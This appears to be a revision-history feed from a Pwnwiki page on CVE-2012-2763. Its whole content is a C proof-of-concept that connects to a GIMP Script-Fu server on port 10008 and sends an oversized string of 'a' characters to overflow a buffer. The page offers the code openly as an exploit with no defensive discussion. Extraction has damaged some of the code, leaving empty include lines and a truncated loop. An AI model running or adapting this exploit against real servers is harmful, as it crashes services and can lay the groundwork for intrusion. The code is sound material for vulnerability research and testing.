https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2012-2763_GIMP_2.6_script-fu%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2012-2763 GIMP 2.6 script-fu緩衝區溢出漏洞 - Revision history
2026-04-14T21:45:32Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2012-2763_GIMP_2.6_script-fu%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=720&oldid=prev
Pwnwiki: Created page with "==POC== <pre> //////////////////////////////////////////////////////////////// // // // PoC for GIMP <= 2.6 Script-Fu server buffer overflow // // Author..."
2021-03-27T03:30:42Z
<p>Created page with "==POC== <pre> //////////////////////////////////////////////////////////////// // // // PoC for GIMP <= 2.6 Script-Fu server buffer overflow // // Author..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
////////////////////////////////////////////////////////////////<br />
// //<br />
// PoC for GIMP <= 2.6 Script-Fu server buffer overflow //<br />
// Author: Joseph Sheridan //<br />
// Date: 20/05/2012 //<br />
// //<br />
// compile with cl scriptfubof.c /link wsock32.lib //<br />
////////////////////////////////////////////////////////////////<br />
<br />
#define WIN32_LEAN_AND_MEAN<br />
#include<br />
#include<br />
#include<br />
#include<br />
<br />
#define DEFAULT_PORT 10008<br />
// TCP socket type<br />
#define DEFAULT_PROTO SOCK_STREAM<br />
void senddata();<br />
void recvdata();<br />
WSADATA wsaData;<br />
SOCKET conn_socket;<br />
char Buffer[2000000];<br />
char inBuffer[128];<br />
<br />
void Usage()<br />
{<br />
printf("Usage: scriptfubof servername portnumber\n");<br />
fflush(stdout);<br />
exit(1);<br />
}<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
<br />
// default to localhost<br />
char *server_name= "localhost";<br />
unsigned short port = DEFAULT_PORT;<br />
int i, loopcount, maxloop=-1;<br />
int retval;<br />
unsigned int addr;<br />
int socket_type = DEFAULT_PROTO;<br />
struct sockaddr_in server;<br />
<br />
if (argc < 3) {<br />
Usage();<br />
}<br />
<br />
if ((retval = WSAStartup(0x202, &wsaData)) != 0)<br />
{<br />
fprintf(stderr,"WSAStartup() failed with error %d\n", retval);<br />
WSACleanup();<br />
return -1;<br />
}<br />
<br />
// Get portnum<br />
port = atoi(argv[2]);<br />
<br />
memset(&server, 0, sizeof(server));<br />
server.sin_addr.s_addr = inet_addr(argv[1]);<br />
server.sin_family = AF_INET;<br />
server.sin_port = htons(port);<br />
<br />
conn_socket = socket(AF_INET, socket_type, 0); /* Open a socket */<br />
if (conn_socket <0 )<br />
{<br />
fprintf(stderr,"Client: Error Opening socket: Error %d\n", WSAGetLastError());<br />
WSACleanup();<br />
return -1;<br />
}<br />
<br />
if (connect(conn_socket, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR)<br />
{<br />
fprintf(stderr,"Client: connect() failed: %d\n", WSAGetLastError());<br />
WSACleanup();<br />
return -1;<br />
}<br />
<br />
// Send the data<br />
senddata();<br />
<br />
// recieve a msg<br />
recvdata();<br />
<br />
closesocket(conn_socket);<br />
WSACleanup();<br />
<br />
return 0;<br />
}<br />
<br />
void senddata() {<br />
<br />
int loopcount = 0, retval =0;<br />
unsigned char command[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";<br />
<br />
<br />
Buffer[0]='\x47'; //Magic byte 'G'<br />
Buffer[1]=sizeof(command)/256; //High byte of L - L div 256<br />
Buffer[2]=sizeof(command)%256; //Low byte of L - L mod 256<br />
strcpy(&Buffer[3],command);<br />
<br />
retval = send(conn_socket, Buffer, sizeof(command) +3, 0);<br />
if (retval == SOCKET_ERROR)<br />
{<br />
fprintf(stderr,"Client: send() failed: error %d.\n", WSAGetLastError());<br />
WSACleanup();<br />
return;<br />
}<br />
else<br />
printf("Client: send() is OK.\n");<br />
printf("Client: Sent data \"%s\"\n", Buffer);<br />
<br />
}<br />
<br />
void recvdata() {<br />
int i=0;<br />
int retval=0;<br />
memset(inBuffer,0,128);<br />
<br />
retval = recv(conn_socket, inBuffer, 128, 0);<br />
printf("retval is :%d\n", retval);<br />
printf("first char is: %x\n", inBuffer[0]);<br />
if (retval == SOCKET_ERROR)<br />
{<br />
fprintf(stderr,"Client: recv() failed: error %d.\n", WSAGetLastError());<br />
closesocket(conn_socket);<br />
WSACleanup();<br />
return;<br />
}<br />
else {<br />
printf("Client: recv() is OK.\n");<br />
<br />
// print the message contents...<br />
<br />
for (i=0;i printf("%c", inBuffer[i]);<br />
<br />
}<br />
printf("\n");<br />
fflush(stdout);<br />
}<br />
<br />
}<br />
<br />
</pre></div>
Pwnwiki